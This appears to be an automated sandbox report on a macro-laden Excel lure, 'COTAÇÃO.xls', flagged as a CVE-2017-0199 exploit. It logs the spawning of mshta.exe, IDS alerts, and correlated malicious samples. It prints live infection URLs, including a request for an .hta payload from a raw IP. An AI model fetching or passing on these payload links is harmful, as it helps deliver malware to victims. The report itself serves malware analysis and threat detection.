Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49705
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49706
Source: excel.exeMemory has grown: Private usage: 2MB later: 83MB
Source: Joe Sandbox ViewIP Address: 3.39.89.152 3.39.89.152
Source: Joe Sandbox ViewIP Address: 13.107.246.67 13.107.246.67
Source: Joe Sandbox ViewIP Address: 5.161.200.29 5.161.200.29
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 13.107.246.67:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 13.107.246.67:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficHTTP traffic detected: GET /YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: st3.proConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /qORxZFFRU3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: link.saja.market
Source: global trafficHTTP traffic detected: GET /xampp/umo/ncr/onceufeelgood.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficDNS traffic detected: DNS query: st3.pro
Source: global trafficDNS traffic detected: DNS query: link.saja.market
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: COTA#U00c7#U00c3O.xls, 59920000.0.drString found in binary or memory: https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen07su
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownHTTPS traffic detected: 5.161.200.29:443 -> 192.168.2.8:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.39.89.152:443 -> 192.168.2.8:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.67:443 -> 192.168.2.8:49704 version: TLS 1.2

System Summary

Source: COTA#U00c7#U00c3O.xlsOLE: Microsoft Excel 2007+
Source: 59920000.0.drOLE: Microsoft Excel 2007+
Source: COTA#U00c7#U00c3O.xlsOLE indicator, VBA macros: true
Source: COTA#U00c7#U00c3O.xlsStream path 'MBD006B205A/\x1Ole' : https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen07suB'4>Ob<"z@`etm_I]H!Lc^CGHKA5S<4,E#:euo*XaK1LvLBy9CH3JJKQ17Rk34HdztDkfKgrmsD8ayfpMkL7MDOhJneu8GV14DJPljyksSx4EVja5eSBmGcKSRZj8zsDmZS4LTcr4xlqIsedrY28TorcdYEiuCerxgKtEKj8Qb4fs5hOEPsa7BW10AprosvPmpourG5TFCoVW4mcid2gkhp6jbvweqSgHYEWunT9ch7wNde3vA*p*]TI9A`'STB+B
Source: 59920000.0.drStream path 'MBD006B205A/\x1Ole' : https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen07suB'4>Ob<"z@`etm_I]H!Lc^CGHKA5S<4,E#:euo*XaK1LvLBy9CH3JJKQ17Rk34HdztDkfKgrmsD8ayfpMkL7MDOhJneu8GV14DJPljyksSx4EVja5eSBmGcKSRZj8zsDmZS4LTcr4xlqIsedrY28TorcdYEiuCerxgKtEKj8Qb4fs5hOEPsa7BW10AprosvPmpourG5TFCoVW4mcid2gkhp6jbvweqSgHYEWunT9ch7wNde3vA*p*]TI9A`'STB+B
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engineClassification label: mal60.expl.winXLS@6/8@3/4
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\59920000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{63A076A9-26BE-4216-97E3-F39B36CC206B} - OProcSessId.datJump to behavior
Source: COTA#U00c7#U00c3O.xlsOLE indicator, Workbook stream: true
Source: 59920000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: COTA#U00c7#U00c3O.xlsVirustotal: Detection: 25%
Source: COTA#U00c7#U00c3O.xlsReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\COTA#U00c7#U00c3O.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: 59920000.0.drInitial sample: OLE indicators vbamacros = False
Source: COTA#U00c7#U00c3O.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: COTA#U00c7#U00c3O.xls; Stream path 'Workbook' entropy: 7.99836815431 (max. 8.0)
Source: 59920000.0.dr; Stream path 'Workbook' entropy: 7.99849101198 (max. 8.0)
Source: C:\Windows\splwow64.exe; Window / User API: threadDelayed 841
Source: C:\Windows\splwow64.exe; Last function: Thread delayed
Source: C:\Windows\splwow64.exe; Thread delayed: delay time: 120000
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information queried: ProcessInformation
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 13 Exploitation for Client Execution | 1 Scripting | 1 Process Injection | 2 Masquerading | OS Credential Dumping | 1 Process Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Extra Window Memory Injection | 1 Process Injection | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Extra Window Memory Injection | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label
COTA#U00c7#U00c3O.xls | 26% | Virustotal |
COTA#U00c7#U00c3O.xls | 21% | ReversingLabs | Document-Excel.Exploit.CVE-2017-0199
No Antivirus matches
Source | Detection | Scanner | Label
https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen | 0% | Avira URL Cloud | safe
https://link.saja.market/qORxZFFRU3 | 0% | Avira URL Cloud | safe
https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen07su | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
st3.pro | 5.161.200.29 | true | false | | high
s-0005.dual-s-msedge.net | 52.123.129.14 | true | false | | high
s-part-0039.t-0009.t-msedge.net | 13.107.246.67 | true | false | | high
service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com | 3.39.89.152 | true | false | | high
otelrules.svc.static.microsoft | unknown | unknown | false | | high
link.saja.market | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundle | false | | high
https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen | false | Avira URL Cloud: safe | unknown
https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xml | false | | high
https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xml | false | | high
https://link.saja.market/qORxZFFRU3 | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen07su | COTA#U00c7#U00c3O.xls, 59920000.0.dr | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
3.39.89.152 | service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com | United States | 8987 | AMAZONEXPANSIONGB | false
172.245.191.88 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false
13.107.246.67 | s-part-0039.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
5.161.200.29 | st3.pro | Germany | 24940 | HETZNER-ASDE | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1634262
Start date and time: 2025-03-10 21:32:23 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Without Instrumentation
Number of analysed new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: COTA#U00c7#U00c3O.xls
renamed because original name is a hash value
Original Sample Name: COTAO.xls
Detection: MAL
Classification: mal60.expl.winXLS@6/8@3/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Active ActiveX Object
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, MavInject32.exe
• Excluded IPs from analysis (whitelisted): 52.109.76.240, 23.60.203.209, 52.109.76.243, 199.232.214.172, 13.89.178.26, 51.116.253.169, 23.199.214.10, 52.109.89.18, 20.189.173.12, 52.123.129.14, 20.190.160.5, 20.109.210.53, 2.23.227.215
• Excluded domains from analysis (whitelisted): onedscolprdgwc04.germanywestcentral.cloudapp.azure.com, onedscolprdwus11.westus.cloudapp.azure.com, slscr.update.microsoft.com, onedscolprdcus00.centralus.cloudapp.azure.com, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, config.officeapps.live.com, e16604.f.a
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
16:34:28 | API Interceptor | 867x Sleep call for process: splwow64.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
3.39.89.152 | Order_Mar25.xls | malicious | Unknown
3.39.89.152 | Order_Mar25.xls | malicious | Unknown
3.39.89.152 | Order_Mar25.xls | malicious | Unknown
3.39.89.152 | POETDB24-2577.xla.xlsx | malicious | Unknown
3.39.89.152 | POETDB24-25771.xla.xlsx | malicious | Unknown
3.39.89.152 | 840.xls | malicious | Unknown
3.39.89.152 | POETDB24-25771.xla.xlsx | malicious | Unknown
3.39.89.152 | POETDB24-25771.xla.xlsx | malicious | Unknown
13.107.246.67 | Order_Mar25.xls | malicious | Unknown
13.107.246.67 | 840.xls | malicious | Unknown
13.107.246.67 | Royal Mail Inland Claim Form V1.3.xlsm | malicious | Unknown
13.107.246.67 | phish_alert_sp2_2.0.0.0.eml | malicious | HTMLPhisher
13.107.246.67 | desaremix.exe | malicious | KillMBR
13.107.246.67 | AccountFactuur8472.xlsm | malicious | KnowBe4
13.107.246.67 | RFQ-JC25-#595837.xlsx | malicious | Unknown
13.107.246.67 | https://onedrive.live.com/redir?resid=5BFC62F3074C4120%21116&authkey=%21AOd_yBhC51KgUHc&page=View&wd=target%28Quick%20Notes.one%7C3c69d085-3af0-472e-a78d-4a68e797d5be%2FLOEB%7C8799eb25-cf12-4e70-a243-200cc3374b83%2F%29&wdorigin=NavigationUrl | malicious | Unknown
13.107.246.67 | Model - 2024 - Azure Model Template 3.26.xlsm | malicious | Unknown
13.107.246.67 | https://wallet.airqon.aero/ | malicious | HTMLPhisher, Invisible JS
5.161.200.29 | Nouvelle_commande9353834.xls | malicious | Unknown
5.161.200.29 | Nouvelle_commande9353834.xls | malicious | Unknown
5.161.200.29 | Nouvelle_commande9353834.xls | malicious | Unknown
5.161.200.29 | POETDB24-2577.xla.xlsx | malicious | Unknown
5.161.200.29 | POETDB24-2577.xla.xlsx | malicious | Unknown
5.161.200.29 | 221036299-043825-sanlccjavap0004-6531.xls | malicious | Unknown
5.161.200.29 | 221036299-043825-sanlccjavap0004-6531.xls | malicious | Unknown
5.161.200.29 | 221036299-043825-sanlccjavap0004-6531.xls | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-0005.dual-s-msedge.net | FW Sensitive - ADMINISTRATIVE LICENSE REVOCATION (ALR) HEARING REQUEST.msg | malicious | Unknown
• 52.123.128.14
s-0005.dual-s-msedge.net | Order_Mar25.xls | malicious | Unknown
• 52.123.129.14
s-0005.dual-s-msedge.net | FW Sensitive - ADMINISTRATIVE LICENSE REVOCATION (ALR) HEARING REQUEST.msg | malicious | Unknown
• 52.123.128.14
s-0005.dual-s-msedge.net | Nouvelle_commande9353834.xls | malicious | Unknown
• 52.123.129.14
s-0005.dual-s-msedge.net | Order_Mar25.xls | malicious | Unknown
• 52.123.128.14
s-0005.dual-s-msedge.net | 840.xls | malicious | Unknown
• 52.123.128.14
s-0005.dual-s-msedge.net | Order_Mar25.xls | malicious | Unknown
• 52.123.128.14
s-0005.dual-s-msedge.net | 840.xls | malicious | Unknown
• 52.123.129.14
bg.microsoft.map.fastly.net | Order_Mar25.xls | malicious | Unknown
• 199.232.210.172
bg.microsoft.map.fastly.net | file.exe | malicious | LummaC Stealer
• 199.232.210.172
bg.microsoft.map.fastly.net | 840.xls | malicious | Unknown
• 199.232.210.172
bg.microsoft.map.fastly.net | U00b7pdf.vbs | malicious | FormBook, GuLoader
• 199.232.214.172
bg.microsoft.map.fastly.net | POETDB24-2577.xla.xlsx | malicious | Unknown
• 199.232.210.172
bg.microsoft.map.fastly.net | POETDB24-25771.xla.xlsx | malicious | Unknown
• 199.232.210.172
bg.microsoft.map.fastly.net | file.exe | malicious | Unknown
• 199.232.214.172
bg.microsoft.map.fastly.net | Section_PE32_image_Aint13_Aint13_body.efi.dll | malicious | Unknown
• 199.232.214.172
bg.microsoft.map.fastly.net | Fd-Employee-Handbook(1).pdf | malicious | Unknown
• 199.232.214.172
bg.microsoft.map.fastly.net | PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbs | malicious | Remcos, GuLoader
• 199.232.214.172
st3.pro | Nouvelle_commande9353834.xls | malicious | Unknown
• 5.161.200.29
st3.pro | POETDB24-2577.xla.xlsx | malicious | Unknown
• 5.161.200.29
st3.pro | POETDB24-2577.xla.xlsx | malicious | Unknown
• 5.161.200.29
st3.pro | 221036299-043825-sanlccjavap0004-6531.xls | malicious | Unknown
                                                                          • 5.161.200.29
                                                                          221036299-043825-sanlccjavap0004-6531.xlsGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          NEW ORDER (PO. 2100002 (BT-INC).xlsGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          New Order.xlsGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUSNouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                          • 52.109.76.243
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.67
                                                                          Nouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                          • 52.123.129.14
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 52.123.128.14
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.60
                                                                          Nouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                          • 20.42.65.88
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.60
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.60
                                                                          AMAZONEXPANSIONGBOrder_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 3.39.89.152
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 3.39.89.152
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 3.39.153.44
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 3.39.89.152
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 3.39.153.44
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 3.39.89.152
                                                                          POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 3.39.89.152
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 3.39.153.44
                                                                          AS-COLOCROSSINGUSNouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                          • 23.95.235.28
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 198.12.89.24
                                                                          Nouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                          • 23.95.235.28
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 192.227.228.22
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 198.23.187.151
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 198.23.187.151
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 192.227.228.22
                                                                          https://dc1.convertc.com/event/v1/80401460/82362114/recentpurc/208463838.0153674575/6/cV9sU2Hc/B751BVZb/X.wgBlUMmEtoL7lLreHRS.dIbQhLbIKHVgjj1IvzEh_5AuOYVcDstYG0DCzEP9XO2LU-/click?url=https://gamma.app/docs/Sayer-Regan-Thayer-LLP-siiq7nvr7y2s7k4?mode=present#card-um3vy81gbcrpf02Get hashmaliciousUnknownBrowse
                                                                          • 192.210.233.190
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          6271f898ce5be7dd52b0fc260d0662b3Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          http://5148882780.sbsGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          Emma Sparkes_cmrdpkuyjxetud.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
